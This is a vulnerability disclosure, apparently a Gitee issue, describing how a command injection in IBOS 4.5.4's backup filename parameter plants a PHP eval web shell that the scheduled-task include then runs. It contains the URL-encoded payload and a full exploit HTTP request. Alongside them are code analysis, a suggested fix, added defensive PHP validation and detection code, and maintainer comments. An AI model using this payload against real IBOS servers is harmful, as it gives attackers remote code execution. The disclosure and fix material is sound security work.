
Arbitrary file inclusion causes getshell

Status: Done
Created on 2020-01-17 20:07

Test environment

OS: Windows
IBOS version: IBOS 4.5.4 OPEN

Vulnerability Test

Step 1 (use the command injection vulnerability)

Use the vulnerability reported at https://gitee.com/ibos/IBOS/issues/I18IIV to write a file into a chosen directory.

First, log in to the IBOS system and enter the management backend. The operation looks like this.

test-4

Use Burp Suite to capture the request and send it to Repeater for modification. Insert the payload into the value of the filename parameter.

test-5

Payload

The payload looks like this. It generates a file named "zzzzzz" in /system/modules/recruit/cron.

%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa

Packet Data

The full request looks like this.

POST /?r=dashboard/database/backup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/?r=dashboard/database/backup
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: P8Jm_saltkey=vpb6gmPE; PHPSESSID=3mcqdm2dr10tf3lb4cgpnl6ah5; P8Jm_sid=KmI412; P8Jm_autologin=1; P8Jm_lastactivity=1579248371; P8Jm_ulastactivity=480fKnWDRYWQhA5jDvpydR3bYm23jT9YOEmv%2FidCRP372M6FAptj
Upgrade-Insecure-Requests: 1

backuptype=custom&customtables%5B%5D=test_announcement&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2020-01-17_kRHRRgOk%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa&dbSubmit=1
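The request above reaches the vulnerable code because the filename value is handed to a shell with the `&` (`%26`) separator intact. As an added example, not code from the original report or from IBOS, here is an allow-list check for that parameter together with a detection pass over captured request bodies; the function names and the two sample bodies are constructed for illustration.

```php
<?php
// Added example (not IBOS code): an allow-list check for the backup filename
// parameter, plus a detection pass over captured request bodies.
// Function names and the sample bodies below are constructed for illustration.

// Only the benign shape seen in the report is accepted: a date, an underscore,
// and a short alphanumeric token. Anything else is refused before any shell use.
function isSafeBackupFilename(string $name): bool
{
    return preg_match('/^\d{4}-\d{2}-\d{2}_[A-Za-z0-9]{1,32}$/', $name) === 1;
}

// Pull the filename parameter out of an application/x-www-form-urlencoded body.
function extractFilename(string $body): ?string
{
    parse_str($body, $params);
    return isset($params['filename']) ? (string) $params['filename'] : null;
}

// Detection view for log or WAF review: report why a body is suspicious.
function detectShellMetachars(string $body): array
{
    $name = extractFilename($body);
    if ($name === null) {
        return ['flagged' => false, 'reason' => 'no filename parameter'];
    }
    // %26 decodes to '&', which is what chains commands in the report's payload.
    if (preg_match('/[&|;`$<>()\r\n]/', $name, $m) === 1) {
        return ['flagged' => true, 'reason' => 'shell metacharacter ' . var_export($m[0], true)];
    }
    $safe = isSafeBackupFilename($name);
    return ['flagged' => !$safe, 'reason' => $safe ? 'clean' : 'outside allow-list'];
}

// Constructed sample bodies: a normal backup request and the injection shape
// from the report, shortened and kept URL-encoded as the browser sends it.
$samples = [
    'benign'   => 'backuptype=custom&method=shell&filename=2020-01-17_kRHRRgOk&dbSubmit=1',
    'injected' => 'backuptype=custom&method=shell&filename=2020-01-17_kRHRRgOk%26cd%20system%26aaa&dbSubmit=1',
];

foreach ($samples as $label => $body) {
    $r = detectShellMetachars($body);
    printf("%-8s flagged=%s (%s)\n", $label, $r['flagged'] ? 'yes' : 'no', $r['reason']);
}
```

The allow-list is the primary control; if the backup code must call a shell at all, an accepted name should still be wrapped in escapeshellarg() as defence in depth.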

Step 2 (modify a scheduled task file)

Open the scheduled task page like this and modify the task. The file name is the one generated in step 1, for example "zzzzzz".

test-6

In this function, modify the "Task script" as shown and submit it.

test-7

Step 3 (run the script)

The script can then be run like this.

test-7

Use Burp Suite's Repeater and add the parameter "test", for example with the value "phpinfo()".

test-8

Running a system command, for example "ipconfig", looks like this.

test-9

Code analysis

The vulnerable file is /system/modules/dashboard/controllers/CronController.php, and the function in question is actionIndex() at line 16.

test-1

At line 40 the getRealCronFile() function builds the complete file path, and lines 41 to 47 hold the string used to filter the filename when a scheduled task is modified.

test-2

The code of getRealCronFile():

test-3

In the code above, the save path and the file name are constrained, but the file's suffix is not, so a file written with arbitrary content through another vulnerability can be included, which yields a shell.

Solution

The include should be restricted to files of a specific type in a specified directory, or to a specific file.
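One way to implement that restriction, as an added example that is not IBOS's own code: the task name is allow-listed as a bare token ending in ".php", canonicalised with realpath(), and checked to sit directly inside the cron directory, so a suffix-less file dropped there (as in the report) can never be included. resolveCronFile() and the throw-away demo directory are assumptions for illustration.

```php
<?php
// Added example (not IBOS code): resolve a scheduled-task script name to a file
// inside the cron directory and refuse anything that is not a .php file there.
// resolveCronFile() and the demo directory are constructed for illustration.

function resolveCronFile(string $cronDir, string $name): ?string
{
    // 1. The name itself must be a bare token ending in .php: no separators,
    //    no dot segments, so a dropped file such as "zzzzz" never qualifies.
    if (preg_match('/^[A-Za-z0-9_-]{1,64}\.php$/', $name) !== 1) {
        return null;
    }
    // 2. Canonicalise both the directory and the candidate. realpath() returns
    //    false for a file that does not exist, so a name is only accepted once
    //    it points at a real file.
    $base = realpath($cronDir);
    $full = realpath($cronDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    // 3. Containment: the canonical file must sit directly inside $base. The
    //    regex already excludes separators; this also catches a symlink that
    //    points outside the directory.
    if (dirname($full) !== $base) {
        return null;
    }
    return $full;
}

// Demo on a throw-away directory with two constructed files: a legitimate task
// script and a suffix-less file of the kind the report plants.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cron_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'good.php', "<?php echo 'task ran';\n");
file_put_contents($dir . DIRECTORY_SEPARATOR . 'zzzzz', "<?php echo 'planted';\n");

$cases = ['good.php', 'zzzzz', 'zzzzz.php', '../config.php', 'good.php/../zzzzz'];
foreach ($cases as $name) {
    $resolved = resolveCronFile($dir, $name);
    printf("%-20s => %s\n", $name, $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

// Clean up the demo files.
unlink($dir . DIRECTORY_SEPARATOR . 'good.php');
unlink($dir . DIRECTORY_SEPARATOR . 'zzzzz');
rmdir($dir);
```

Tighter still, and closest to the "or a specified file" part of the suggestion, is to keep a registry of known task names and compare the submitted name against it before touching the filesystem at all; the path check above then only serves as a second line of defence.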

Comments (5)

c0d1M4x created the task 5 years ago

Great find on this issue. Unfortunately IBOS is no longer maintained. Are you from Harbin?

@mahuan No, I'm from Guangdong. You're in Harbin?

@c0deCC Yes, I'm in Harbin. Do you usually use IBOS and Yii?

@mahuan Not really, I just do some security testing on IBOS.

seekArt changed the task status from To Do to In Progress 5 years ago

@mahuan Not really, I just do some security testing on IBOS.

@c0deCC

Thanks for submitting the issue. For personal health and energy reasons I have long neglected updating this open-source repository, and I apologise to all of its users. If you are interested in sending PRs and maintaining it, you can accept this invitation. https://gitee.com/ibos/IBOS/invite_link?invite=01b415e2534ea3042efc3e1abcb4a556449e1ef86486475c8b40572f73d50c1ed2d883d557bd3e9863ce7e16acfba504

seekArt changed the task status from In Progress to Done 4 years ago
